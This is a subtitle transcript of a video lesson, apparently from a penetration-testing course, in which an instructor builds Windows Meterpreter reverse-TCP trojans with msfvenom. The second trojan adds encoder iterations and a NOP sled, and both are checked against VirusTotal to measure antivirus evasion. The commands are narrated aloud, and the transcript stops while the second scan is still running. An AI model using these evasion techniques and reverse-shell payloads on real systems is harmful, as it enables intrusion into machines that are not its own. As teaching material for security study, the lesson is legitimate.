1
00:00:00,300 --> 00:00:01,680
Instructor: Welcome back.

2
00:00:01,680 --> 00:00:04,050
Let's get back to our payload creation.

3
00:00:04,050 --> 00:00:06,270
So in the previous video we saw

4
00:00:06,270 --> 00:00:11,270
how we can create a simple dot exe Trojan using msfvenom.

5
00:00:11,850 --> 00:00:13,770
We use the basic options where

6
00:00:13,770 --> 00:00:16,860
we only set local host and local port.

7
00:00:16,860 --> 00:00:19,320
Now let's check out some other options

8
00:00:19,320 --> 00:00:20,673
that we have available.

9
00:00:21,540 --> 00:00:23,460
If I go and open up my terminal,

10
00:00:23,460 --> 00:00:26,913
and run the command msfvenom dash H,

11
00:00:28,590 --> 00:00:31,350
we will get our help manual.

12
00:00:31,350 --> 00:00:33,990
And the purpose of all of these other options

13
00:00:33,990 --> 00:00:36,150
that we can see right here will usually be

14
00:00:36,150 --> 00:00:39,330
to either bypass an antivirus or to make

15
00:00:39,330 --> 00:00:41,310
your payload smaller in size

16
00:00:41,310 --> 00:00:43,710
or something similar to that.

17
00:00:43,710 --> 00:00:44,850
Basically, it is used

18
00:00:44,850 --> 00:00:48,510
for creating a payload for your own needs.

19
00:00:48,510 --> 00:00:50,760
For example, in the previous video

20
00:00:50,760 --> 00:00:52,410
we created a payload that was

21
00:00:52,410 --> 00:00:56,250
a Windows Meterpreter shell as an exe file.

22
00:00:56,250 --> 00:01:00,150
But we can create other file types if we want.

23
00:01:00,150 --> 00:01:03,270
To check out what other file types can we create,

24
00:01:03,270 --> 00:01:08,070
we can run the command msfvenom dash dash list formats,

25
00:01:08,070 --> 00:01:11,760
and it tells us that right here under the dash F command,

26
00:01:11,760 --> 00:01:14,700
we can use dash dash list formats to list all

27
00:01:14,700 --> 00:01:15,810
of the available formats.

28
00:01:15,810 --> 00:01:18,390
So let's do that real quick.

29
00:01:18,390 --> 00:01:21,663
Dash dash, list and then formats.

30
00:01:22,620 --> 00:01:24,900
This will take a few seconds to execute

31
00:01:24,900 --> 00:01:27,900
and seeing this will be really useful.

32
00:01:27,900 --> 00:01:28,740
Why?

33
00:01:28,740 --> 00:01:30,900
Well, imagine you were sending a payload

34
00:01:30,900 --> 00:01:32,850
to a Linux machine.

35
00:01:32,850 --> 00:01:36,270
Any exe file wouldn't be much useful then, right?

36
00:01:36,270 --> 00:01:40,650
However, a Python file could be of use in that case.

37
00:01:40,650 --> 00:01:44,070
Well, msfvenom allows us to create any file type

38
00:01:44,070 --> 00:01:45,570
that we want.

39
00:01:45,570 --> 00:01:48,630
So let's check out all of the available file types.

40
00:01:48,630 --> 00:01:52,680
So up here, we can see we can create asp, dll,

41
00:01:52,680 --> 00:01:56,160
exe, some other file types as well.

42
00:01:56,160 --> 00:01:57,210
We can go down here,

43
00:01:57,210 --> 00:01:58,920
we can see different programming languages

44
00:01:58,920 --> 00:02:00,930
such as C, Csharp.

45
00:02:00,930 --> 00:02:04,800
We can create in Perl, in PowerShell, in Python.

46
00:02:04,800 --> 00:02:07,320
We can also do Ruby, SH

47
00:02:07,320 --> 00:02:10,710
and many other file formats if we want.

48
00:02:10,710 --> 00:02:12,180
And what I also want to show you

49
00:02:12,180 --> 00:02:15,930
besides this is different options that are also useful,

50
00:02:15,930 --> 00:02:18,240
whether it is for bypassing antivirus

51
00:02:18,240 --> 00:02:20,130
or changing the size of your payload.

52
00:02:20,130 --> 00:02:21,930
Let us check them out.

53
00:02:21,930 --> 00:02:23,160
So let's create a couple

54
00:02:23,160 --> 00:02:25,890
of payloads right now and compare them.

55
00:02:25,890 --> 00:02:27,450
Let me clear the screen first.

56
00:02:27,450 --> 00:02:28,770
And to compare them,

57
00:02:28,770 --> 00:02:31,383
we're going to use a site called VirusTotal.

58
00:02:32,850 --> 00:02:35,940
And to do that and to visit the site

59
00:02:35,940 --> 00:02:38,310
we must open the Firefox.

60
00:02:38,310 --> 00:02:41,160
And what VirusTotal is is a website

61
00:02:41,160 --> 00:02:43,560
where you upload your viruses and they will tell you

62
00:02:43,560 --> 00:02:46,740
how many antivirus vendors are able to detect it

63
00:02:46,740 --> 00:02:47,973
as a malicious program.

64
00:02:48,840 --> 00:02:53,840
So if I open VirusTotal by typing virustotal right here,

65
00:02:55,380 --> 00:02:59,850
go to the first link, which is this one, virustotal.com.

66
00:02:59,850 --> 00:03:04,110
And one thing to keep in mind is that every file you upload

67
00:03:04,110 --> 00:03:08,040
to this website is sent to the antivirus vendors.

68
00:03:08,040 --> 00:03:10,860
So something that might be undetectable today,

69
00:03:10,860 --> 00:03:13,470
after uploading it to this website,

70
00:03:13,470 --> 00:03:15,960
it will for sure become detectable

71
00:03:15,960 --> 00:03:18,330
in a few days or a week.

72
00:03:18,330 --> 00:03:20,730
Are there other websites that don't send your files

73
00:03:20,730 --> 00:03:22,320
to antivirus vendors?

74
00:03:22,320 --> 00:03:24,693
Yes, but they are not as good as VirusTotal.

75
00:03:25,530 --> 00:03:28,020
And we already know that undetectable virus

76
00:03:28,020 --> 00:03:30,330
is a game of cat and mouse.

77
00:03:30,330 --> 00:03:33,930
Today, it's undetectable, tomorrow it isn't.

78
00:03:33,930 --> 00:03:37,530
So this isn't really something to worry about right now.

79
00:03:37,530 --> 00:03:40,770
Let's create two payloads real fast.

80
00:03:40,770 --> 00:03:42,750
So the first one that we are going to create is

81
00:03:42,750 --> 00:03:44,520
going to be the one from the previous video.

82
00:03:44,520 --> 00:03:45,660
So let's do it real fast,

83
00:03:45,660 --> 00:03:47,580
we already know how to do that.

84
00:03:47,580 --> 00:03:52,237
It will be a 64-bit payload meterpreter reverse tcp,

85
00:03:53,220 --> 00:03:55,440
LHOST will be equal to the IP address.

86
00:03:55,440 --> 00:03:57,873
So let's check it out real quick.

87
00:04:00,270 --> 00:04:03,960
Dot one dot 12 and if I specify it right here,

88
00:04:03,960 --> 00:04:07,710
LPORT can be 5555, it doesn't really matter.

89
00:04:07,710 --> 00:04:10,650
The format will be exe and the output

90
00:04:10,650 --> 00:04:13,503
we can save it as shell1 dot exe.

91
00:04:14,490 --> 00:04:15,363
Press enter.

92
00:04:16,230 --> 00:04:18,029
And as soon as this finishes,

93
00:04:18,029 --> 00:04:19,697
we are going to upload this payload

94
00:04:19,697 --> 00:04:22,079
to the VirusTotal to see

95
00:04:22,079 --> 00:04:25,470
how many antiviruses detected as a malicious program.

96
00:04:25,470 --> 00:04:26,520
So it has finished.

97
00:04:26,520 --> 00:04:28,650
Let us go to the VirusTotal website,

98
00:04:28,650 --> 00:04:30,600
click and choose a file,

99
00:04:30,600 --> 00:04:32,250
navigate to the desktop directory

100
00:04:32,250 --> 00:04:35,700
and select shell1 dot exe.

101
00:04:35,700 --> 00:04:37,140
I will double-click it.

102
00:04:37,140 --> 00:04:38,490
I will confirm the upload

103
00:04:38,490 --> 00:04:41,340
and it will upload the shell for me.

104
00:04:41,340 --> 00:04:44,040
Now this scan will take a minute or two.

105
00:04:44,040 --> 00:04:45,510
So while that is doing,

106
00:04:45,510 --> 00:04:49,230
what we can do is we can create our second payload

107
00:04:49,230 --> 00:04:50,760
and to create the second payload,

108
00:04:50,760 --> 00:04:54,150
we're going to use some additional options.

109
00:04:54,150 --> 00:04:56,430
So I'll clear the screen right here

110
00:04:56,430 --> 00:05:00,450
and I will type msfvenom dash H right here.

111
00:05:00,450 --> 00:05:02,970
So we have the help manual available.

112
00:05:02,970 --> 00:05:06,507
Then I will go right here and run the command msfvenom.

113
00:05:06,507 --> 00:05:08,040
We will use the same payload

114
00:05:08,040 --> 00:05:10,360
which is Windows x64 meterpreter

115
00:05:11,250 --> 00:05:13,443
slash reverse tcp.

116
00:05:14,400 --> 00:05:18,242
We will select the local host 192 dot 168

117
00:05:18,242 --> 00:05:22,920
dot 1 dot 12, local port will be 5555.

118
00:05:22,920 --> 00:05:25,260
After this, we can use the dash A option

119
00:05:25,260 --> 00:05:26,910
to select the payload architecture.

120
00:05:26,910 --> 00:05:29,700
As we can see right here, dash A stands for

121
00:05:29,700 --> 00:05:32,790
the architecture to use for the payload.

122
00:05:32,790 --> 00:05:35,130
So let's go and select x64

123
00:05:35,130 --> 00:05:37,110
because in my case, I'm attacking

124
00:05:37,110 --> 00:05:39,330
a Windows 10 64-bit machine.

125
00:05:39,330 --> 00:05:41,430
If your Windows machine is 32-bit,

126
00:05:41,430 --> 00:05:44,190
you can proceed with x86.

127
00:05:44,190 --> 00:05:46,530
Okay, the next thing that we are going

128
00:05:46,530 --> 00:05:50,760
to use is a very interesting thing and that is an encoder.

129
00:05:50,760 --> 00:05:52,560
And what is an encoder?

130
00:05:52,560 --> 00:05:55,590
Well, let's go right here and find the dash E option,

131
00:05:55,590 --> 00:05:57,300
which says right here the encoder.

132
00:05:57,300 --> 00:05:59,310
And what we need to specify after it

133
00:05:59,310 --> 00:06:01,620
is the encoder that we want to use.

134
00:06:01,620 --> 00:06:05,370
Encoders can help us bypass some of the antiviruses.

135
00:06:05,370 --> 00:06:07,620
To list all of the encoders that we have,

136
00:06:07,620 --> 00:06:10,200
we can use dash dash list encoders.

137
00:06:10,200 --> 00:06:11,400
So let's do that first.

138
00:06:11,400 --> 00:06:15,570
So msfvenom dash dash list,

139
00:06:15,570 --> 00:06:17,103
and then encoders.

140
00:06:19,530 --> 00:06:20,820
And here they are.

141
00:06:20,820 --> 00:06:22,050
We get bunch of encoders

142
00:06:22,050 --> 00:06:25,500
for x86 or for 32-bit architecture.

143
00:06:25,500 --> 00:06:29,790
We get some for the x64 or 64-bit architecture.

144
00:06:29,790 --> 00:06:34,350
And we get some other encoders up here as well.

145
00:06:34,350 --> 00:06:35,880
Now the ones that we're interested in

146
00:06:35,880 --> 00:06:38,910
at the moment are these x64 ones.

147
00:06:38,910 --> 00:06:40,620
So we are going to go

148
00:06:40,620 --> 00:06:45,390
with this one, x64 slash zutto underscore dekiru.

149
00:06:45,390 --> 00:06:48,900
So let's copy its name right here

150
00:06:48,900 --> 00:06:52,533
and paste it after the dash E.

151
00:06:53,520 --> 00:06:56,220
Now, if we go back to the help manual

152
00:06:56,220 --> 00:06:58,350
and go back to the encoder,

153
00:06:58,350 --> 00:07:00,600
another option that is closely linked

154
00:07:00,600 --> 00:07:03,990
to the encoder is this dash I option.

155
00:07:03,990 --> 00:07:06,330
And it is the amount of iterations.

156
00:07:06,330 --> 00:07:07,860
As it says in the description,

157
00:07:07,860 --> 00:07:11,490
this is the number of times to encode the payload.

158
00:07:11,490 --> 00:07:14,490
So if I go right here after selecting the encoder,

159
00:07:14,490 --> 00:07:17,700
we want to select dash I to specify the number

160
00:07:17,700 --> 00:07:21,000
of iterations that we want to encode our payload.

161
00:07:21,000 --> 00:07:23,970
Now, the more iterations, the bigger the payload

162
00:07:23,970 --> 00:07:26,850
will be in size, but it also might mean

163
00:07:26,850 --> 00:07:30,270
that it will be less detectable to the antivirus vendors.

164
00:07:30,270 --> 00:07:31,800
So let's specify dash I

165
00:07:31,800 --> 00:07:36,240
and then let's perform 15 iterations, for example.

166
00:07:36,240 --> 00:07:38,670
After it, we're going to specify the platform

167
00:07:38,670 --> 00:07:41,733
on which the payload will run, which is Windows.

168
00:07:42,660 --> 00:07:44,340
And after it, we are going to use the

169
00:07:44,340 --> 00:07:48,030
dash N option and select 500.

170
00:07:48,030 --> 00:07:50,250
Now to see what this dash N option is,

171
00:07:50,250 --> 00:07:51,840
we can go right here

172
00:07:51,840 --> 00:07:55,620
and in the dash N, we can see it is nopsled.

173
00:07:55,620 --> 00:07:59,700
It'll prevent a nopsled of length size onto the payload.

174
00:07:59,700 --> 00:08:01,450
Remember what a NOP is?

175
00:08:01,450 --> 00:08:02,700
A NOP is an instruction

176
00:08:02,700 --> 00:08:05,220
for the processor to not do anything.

177
00:08:05,220 --> 00:08:07,140
And here we are simply just telling

178
00:08:07,140 --> 00:08:09,900
how many NOPs we want to add to our payload.

179
00:08:09,900 --> 00:08:11,940
Once we select bunch of these options,

180
00:08:11,940 --> 00:08:15,330
we can add at the end dash F to be an exe,

181
00:08:15,330 --> 00:08:20,330
and dash O to be shell2 dot exe.

182
00:08:20,940 --> 00:08:22,890
So this is our second shell.

183
00:08:22,890 --> 00:08:26,160
Let's run it and wait for msfvenom to create our payload.

184
00:08:26,160 --> 00:08:27,750
And while it is creating the payload,

185
00:08:27,750 --> 00:08:29,370
let's go to the VirusTotal

186
00:08:29,370 --> 00:08:32,549
and see how many detections we got

187
00:08:32,549 --> 00:08:34,650
with the regular meterpreter shell.

188
00:08:34,650 --> 00:08:39,360
So of 68 antiviruses, 43 detected this

189
00:08:39,360 --> 00:08:42,270
as a malicious program and here we can see

190
00:08:42,270 --> 00:08:45,030
which ones detected it as a malicious program

191
00:08:45,030 --> 00:08:46,863
and which ones didn't.

192
00:08:47,700 --> 00:08:48,803
Hmm, let's see,

193
00:08:48,803 --> 00:08:53,640
what if we get any better result using the second shell.

194
00:08:53,640 --> 00:08:56,160
So we can see right here it has been created,

195
00:08:56,160 --> 00:09:00,510
successfully added NOP sled of size 500 from x64 simple.

196
00:09:00,510 --> 00:09:04,470
The final size of the exe file is 8,000 bytes.

197
00:09:04,470 --> 00:09:05,880
So let's go to VirusTotal.

198
00:09:05,880 --> 00:09:08,820
And remember this number 43 out of 68.

199
00:09:08,820 --> 00:09:10,020
And let's see whether we can

200
00:09:10,020 --> 00:09:12,960
at least bypass a little bit more antiviruses

201
00:09:12,960 --> 00:09:14,970
than from this first scan.

202
00:09:14,970 --> 00:09:18,063
Let's select the shell2 dot exe, confirm the upload.

203
00:09:19,020 --> 00:09:20,610
Now, while this is scanning,

204
00:09:20,610 --> 00:09:22,740
let me tell you something real quick.

205
00:09:22,740 --> 00:09:25,590
With the MSF options, don't expect to get

206
00:09:25,590 --> 00:09:29,130
much better results once applying some additional options

207
00:09:29,130 --> 00:09:30,450
or something like that.

208
00:09:30,450 --> 00:09:31,740
As I already mentioned,

209
00:09:31,740 --> 00:09:34,350
the msfvenom is a really known tool

210
00:09:34,350 --> 00:09:37,410
and everyone use these options to generate payloads.

211
00:09:37,410 --> 00:09:41,610
So they are very well known to all the antivirus vendors.

212
00:09:41,610 --> 00:09:43,860
Here we can see our second shell is scanning

213
00:09:43,860 --> 00:09:47,553
and let's see whether we get a lower number than 43.